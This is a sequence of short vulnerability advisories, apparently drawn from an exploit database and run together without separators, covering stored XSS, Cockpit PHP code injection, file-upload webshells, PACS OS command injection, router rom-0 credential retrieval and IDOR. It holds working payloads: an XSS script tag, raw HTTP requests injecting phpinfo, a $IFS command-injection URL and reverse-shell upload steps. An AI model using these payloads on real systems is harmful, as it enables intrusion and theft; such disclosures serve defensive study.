When a user clicks on the 'add new record' button, they can enter malicious JavaScript code into the parameters. When the record is added, the malicious code will be stored in the database and will be executed when the page is refreshed.
Log into the application, click on Pass, then click Add a Pass. Put <script>alert(1)</script> in the Full Name parameter and fill the remaining fields with anything, then go to Manage Passes and view the pass you just created; an alert(1) popup will appear.
Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

Exploit (Login):

POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com

{"auth":{"user":"test'.phpinfo().'","password":"b"}}

Exploit (Password reset):

POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Origin: https://example.com

{"user":"test'.phpinfo().'"}
An unrestricted file upload vulnerability in Employee Record System 1.0 allows an attacker to upload a malicious file, such as a webshell, to the server. This can be exploited to execute arbitrary code on the server, leading to remote code execution. The vulnerability exists in the 'Add Employee' page, where an attacker can upload a malicious file in the 'Upload Employee Photo' and 'Upload Employee ID' fields. The malicious file is then accessible via a direct URL, allowing an attacker to execute arbitrary code on the server.
ECSIMAGING PACS Application 6.21.5 and below suffers from an OS command injection vulnerability. The 'file' parameter of the page /showfile.php can be exploited with a simple OS injection to gain root access, because the www-data user has sudo NOPASSWD access. Command injection can be achieved with the $IFS trick: <url>/showfile.php?file=;ls$IFS-la$IFS/.
The iBall-Baton router, version WRA150N, is vulnerable to the rom-0 exploit. rom-0 is a file that contains the ADSL login credentials; on this router, access to the file is, unusually, not protected. The file can be retrieved by entering the router's IP address in the browser followed by /rom-0 (for example, 192.168.1.1/rom-0), which downloads the rom-0 file. The file is obfuscated, however, and needs to be deobfuscated using an online decoder or with threat9's RouterSploit, using the router/multi/rom-0 module.
Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable to Java EL injection which allows a low privilege user to remotely execute code on the target server.
A user can manipulate the parameter "UserIndex" on the personal settings page. This parameter allows unauthorized access to view or change other users' personal information.
A stored cross-site scripting vulnerability exists in the Responsive E-Learning System 1.0, which allows an attacker to inject malicious JavaScript code into the application. By exploiting this vulnerability, an attacker can gain access to the application and execute malicious code on the victim's browser.
An attacker can exploit the unrestricted file upload vulnerability in the Responsive E-Learning System 1.0 to gain remote code execution. The attacker logs into the application with admin credentials, clicks on Student (or goes to http://localhost/elearning/admin/student.php), clicks on Add Student and fills in the required fields, uploading a PHP reverse shell in the image field. The attacker can then visit http://localhost/elearning/admin/uploads/ and select the uploaded PHP web shell.